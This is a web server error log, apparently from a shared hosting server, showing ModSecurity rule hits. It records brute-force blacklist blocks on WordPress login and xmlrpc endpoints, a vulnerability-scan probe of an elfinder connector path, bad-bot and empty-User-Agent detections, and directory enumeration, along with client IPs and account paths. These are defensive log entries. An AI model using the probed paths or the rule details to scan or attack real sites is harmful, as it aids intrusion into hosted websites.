[Tue May 26 17:05:15.293675 2026] [security2:error] [pid 851641:tid 851824] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFchp8QSN2510avp4zMwAAADU"]
[Tue May 26 17:05:16.031202 2026] [security2:error] [pid 851641:tid 851822] [client 14.172.99.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFcxp8QSN2510avp4zRAAAADM"]
[Tue May 26 17:05:17.981936 2026] [security2:error] [pid 851641:tid 851811] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFdRp8QSN2510avp4zaQAAACg"]
[Tue May 26 17:05:20.179042 2026] [security2:error] [pid 851641:tid 851865] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFdxp8QSN2510avp4zngAAAF4"]
[Tue May 26 17:05:20.912566 2026] [security2:error] [pid 851641:tid 851864] [client 203.194.101.7:49805] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWFeBp8QSN2510avp4zuAAAAF0"]
[Tue May 26 17:05:20.912762 2026] [security2:error] [pid 851641:tid 851864] [client 203.194.101.7:49805] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWFeBp8QSN2510avp4zuAAAAF0"]
[Tue May 26 17:05:21.761658 2026] [security2:error] [pid 851641:tid 851885] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFeRp8QSN2510avp4zyAAAAHI"]
[Tue May 26 17:05:23.212679 2026] [security2:error] [pid 851641:tid 851708] [remote 92.117.185.70:62716] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 70.185.117.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWFehp8QSN2510avp4z5wAAX0I"]
[Tue May 26 17:05:24.441341 2026] [security2:error] [pid 851641:tid 851882] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFfBp8QSN2510avp4z_QAAAG8"]
[Tue May 26 17:05:26.067094 2026] [security2:error] [pid 851641:tid 851798] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFfRp8QSN2510avp40NgAAABs"]
[Tue May 26 17:05:26.485570 2026] [security2:error] [pid 851641:tid 851773] [client 208.91.198.85:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahWFfhp8QSN2510avp40TQAAAAI"]
[Tue May 26 17:05:26.586328 2026] [security2:error] [pid 851641:tid 851707] [remote 103.91.67.202:64194] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 202.67.91.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWFfhp8QSN2510avp40TwAAekE"]
[Tue May 26 17:05:27.302640 2026] [security2:error] [pid 851641:tid 851782] [client 208.91.198.85:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahWFfxp8QSN2510avp40ZQAAAAs"]
[Tue May 26 17:05:27.379276 2026] [security2:error] [pid 851641:tid 851819] [client 208.91.198.85:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahWFfxp8QSN2510avp40bAAAADA"]
[Tue May 26 17:05:27.493245 2026] [security2:error] [pid 851641:tid 851825] [client 208.91.198.85:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahWFfxp8QSN2510avp40bwAAADY"]
[Tue May 26 17:05:28.323005 2026] [security2:error] [pid 851641:tid 851863] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFfxp8QSN2510avp40fwAAAFw"]
[Tue May 26 17:05:28.568137 2026] [core:crit] [pid 851641:tid 851850] (13)Permission denied: [client 66.249.70.137:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 17:05:28.576643 2026] [security2:error] [pid 851641:tid 851738] [remote 54.36.102.244:55930] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 244.102.36.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWFgBp8QSN2510avp40hQAAemA"]
[Tue May 26 17:05:31.282990 2026] [security2:error] [pid 851641:tid 851886] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFghp8QSN2510avp40wAAAAHM"]
[Tue May 26 17:05:31.307004 2026] [security2:error] [pid 851641:tid 851771] [client 203.194.101.7:50140] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWFgxp8QSN2510avp40zQAAAAA"]
[Tue May 26 17:05:31.307109 2026] [security2:error] [pid 851641:tid 851771] [client 203.194.101.7:50140] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWFgxp8QSN2510avp40zQAAAAA"]
[Tue May 26 17:05:33.060837 2026] [security2:error] [pid 851641:tid 851846] [client 74.7.175.137:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.rainadelproperties.com.taotechservices.com"] [uri "/robots.txt"] [unique_id "ahWFhRp8QSN2510avp409gAAAEs"]
[Tue May 26 17:05:33.062517 2026] [security2:error] [pid 851641:tid 851829] [client 74.7.175.137:38992] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.rainadelproperties.com.taotechservices.com"] [uri "/robots.txt"] [unique_id "ahWFhRp8QSN2510avp408gAAOk0"]
[Tue May 26 17:05:33.146410 2026] [security2:error] [pid 851641:tid 851876] [client 74.7.175.158:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.rainadelproperties.com"] [uri "/robots.txt"] [unique_id "ahWFhRp8QSN2510avp40_QAAAGk"]
[Tue May 26 17:05:33.147370 2026] [security2:error] [pid 851641:tid 851837] [client 74.7.175.158:35962] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.rainadelproperties.com"] [uri "/robots.txt"] [unique_id "ahWFhRp8QSN2510avp40-AAAQiM"]
[Tue May 26 17:05:33.492596 2026] [security2:error] [pid 851641:tid 851797] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFhRp8QSN2510avp409wAAABo"]
[Tue May 26 17:05:34.968076 2026] [security2:error] [pid 851641:tid 851866] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFhhp8QSN2510avp41IgAAAF8"]
[Tue May 26 17:05:37.819504 2026] [security2:error] [pid 851641:tid 851775] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFiRp8QSN2510avp41ZAAAAAQ"]
[Tue May 26 17:05:38.168971 2026] [security2:error] [pid 851641:tid 851649] [remote 74.7.241.58:46026] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWFihp8QSN2510avp41gQAAXQc"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-includes
[Tue May 26 17:05:39.423171 2026] [security2:error] [pid 851641:tid 851827] [client 109.248.204.72:42831] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWFixp8QSN2510avp41mgAAADg"], referer: https://www.cagmedya.com/web-tasarim/
[Tue May 26 17:05:39.459064 2026] [security2:error] [pid 851641:tid 851892] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFixp8QSN2510avp41lgAAAHk"]
[Tue May 26 17:05:41.672946 2026] [security2:error] [pid 851641:tid 851859] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFjRp8QSN2510avp415wAAAFg"]
[Tue May 26 17:05:41.918873 2026] [security2:error] [pid 851641:tid 851782] [client 203.194.101.7:50473] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWFjRp8QSN2510avp41-AAAAAs"]
[Tue May 26 17:05:41.919031 2026] [security2:error] [pid 851641:tid 851782] [client 203.194.101.7:50473] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWFjRp8QSN2510avp41-AAAAAs"]
[Tue May 26 17:05:43.596086 2026] [security2:error] [pid 851641:tid 851795] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFjxp8QSN2510avp42IgAAABg"]
[Tue May 26 17:05:44.276212 2026] [security2:error] [pid 851641:tid 851818] [client 14.191.253.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFjxp8QSN2510avp42LwAAAC8"]
[Tue May 26 17:05:44.550044 2026] [security2:error] [pid 851641:tid 851802] [client 68.183.88.172:51904] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "cicodev.org"] [uri "/"] [unique_id "ahWFkBp8QSN2510avp42RwAAAB8"]
[Tue May 26 17:05:45.951876 2026] [security2:error] [pid 851641:tid 851867] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFkRp8QSN2510avp42YQAAAGA"]
[Tue May 26 17:05:47.957231 2026] [security2:error] [pid 851641:tid 851844] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFkxp8QSN2510avp42jAAAAEk"]
[Tue May 26 17:05:50.289238 2026] [security2:error] [pid 851641:tid 851790] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFlRp8QSN2510avp42tgAAABM"]
[Tue May 26 17:05:51.896331 2026] [security2:error] [pid 851641:tid 851779] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFlxp8QSN2510avp423AAAAAg"]
[Tue May 26 17:05:52.238581 2026] [security2:error] [pid 851641:tid 851829] [client 203.194.101.7:50823] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWFmBp8QSN2510avp426gAAADo"]
[Tue May 26 17:05:52.238719 2026] [security2:error] [pid 851641:tid 851829] [client 203.194.101.7:50823] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWFmBp8QSN2510avp426gAAADo"]
[Tue May 26 17:05:54.585345 2026] [security2:error] [pid 851641:tid 851884] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFmhp8QSN2510avp43GAAAAHE"]
[Tue May 26 17:05:55.456574 2026] [security2:error] [pid 851641:tid 851851] [client 64.89.161.160:51351] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 160.161.89.64.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dgssi.in"] [uri "/assets/admin/plugins/elfinder/connectors/php/connector.php"] [unique_id "ahWFmxp8QSN2510avp43NAAAAFA"]
[Tue May 26 17:05:56.710198 2026] [security2:error] [pid 851641:tid 851893] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFnBp8QSN2510avp43QwAAAHo"]
[Tue May 26 17:05:56.719388 2026] [autoindex:error] [pid 851641:tid 851880] [client 89.117.104.11:0] AH01276: Cannot serve directory /home1/anujtrad/public_html/wp-content/uploads/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:05:56.720041 2026] [security2:error] [pid 851641:tid 851880] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWFnBp8QSN2510avp43TQAAAG0"]
[Tue May 26 17:05:56.720385 2026] [security2:error] [pid 851641:tid 851837] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/wp-content/uploads/"] [unique_id "ahWFnBp8QSN2510avp43SwAAAEI"]
[Tue May 26 17:05:56.972314 2026] [autoindex:error] [pid 851641:tid 851864] [client 89.117.104.11:0] AH01276: Cannot serve directory /home1/anujtrad/public_html/wp-includes/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:05:56.972995 2026] [security2:error] [pid 851641:tid 851864] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWFnBp8QSN2510avp43UAAAAF0"]
[Tue May 26 17:05:56.973417 2026] [security2:error] [pid 851641:tid 851891] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/wp-includes/"] [unique_id "ahWFnBp8QSN2510avp43TgAAAHg"]
[Tue May 26 17:05:57.274519 2026] [autoindex:error] [pid 851641:tid 851773] [client 89.117.104.11:0] AH01276: Cannot serve directory /home1/anujtrad/public_html/wp-includes/css/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:05:57.275228 2026] [security2:error] [pid 851641:tid 851773] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWFnRp8QSN2510avp43WwAAAAI"]
[Tue May 26 17:05:57.299878 2026] [security2:error] [pid 851641:tid 851888] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/wp-includes/css/"] [unique_id "ahWFnRp8QSN2510avp43WQAAAHU"]
[Tue May 26 17:05:57.572913 2026] [autoindex:error] [pid 851641:tid 851838] [client 89.117.104.11:0] AH01276: Cannot serve directory /home1/anujtrad/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:05:57.573769 2026] [security2:error] [pid 851641:tid 851838] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWFnRp8QSN2510avp43YwAAAEM"]
[Tue May 26 17:05:57.574213 2026] [security2:error] [pid 851641:tid 851884] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/wp-includes/ID3/"] [unique_id "ahWFnRp8QSN2510avp43YAAAAHE"]
[Tue May 26 17:05:57.826410 2026] [autoindex:error] [pid 851641:tid 851847] [client 89.117.104.11:0] AH01276: Cannot serve directory /home1/anujtrad/public_html/wp-includes/IXR/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:05:57.827116 2026] [security2:error] [pid 851641:tid 851847] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWFnRp8QSN2510avp43ZwAAAEw"]
[Tue May 26 17:05:57.827511 2026] [security2:error] [pid 851641:tid 851894] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/wp-includes/IXR/"] [unique_id "ahWFnRp8QSN2510avp43ZQAAAHs"]
[Tue May 26 17:05:58.075560 2026] [autoindex:error] [pid 851641:tid 851866] [client 89.117.104.11:0] AH01276: Cannot serve directory /home1/anujtrad/public_html/wp-includes/Requests/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:05:58.076203 2026] [security2:error] [pid 851641:tid 851866] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWFnhp8QSN2510avp43bwAAAF8"]
[Tue May 26 17:05:58.076984 2026] [security2:error] [pid 851641:tid 851825] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/wp-includes/Requests/"] [unique_id "ahWFnhp8QSN2510avp43bQAAADY"]
[Tue May 26 17:05:58.589589 2026] [autoindex:error] [pid 851641:tid 851783] [client 89.117.104.11:0] AH01276: Cannot serve directory /home1/anujtrad/public_html/wp-includes/SimplePie/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:05:58.590358 2026] [security2:error] [pid 851641:tid 851783] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWFnhp8QSN2510avp43fgAAAAw"]
[Tue May 26 17:05:58.590867 2026] [security2:error] [pid 851641:tid 851821] [client 89.117.104.11:48000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/wp-includes/SimplePie/"] [unique_id "ahWFnhp8QSN2510avp43fAAAADI"]
[Tue May 26 17:05:58.797906 2026] [autoindex:error] [pid 851641:tid 851834] [client 89.117.104.11:0] AH01276: Cannot serve directory /home1/anujtrad/public_html/wp-includes/Text/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:05:58.798571 2026] [security2:error] [pid 851641:tid 851834] [client 89.117.104.11:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "anujtradingco.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWFnhp8QSN2510avp43hwAAAD8"]
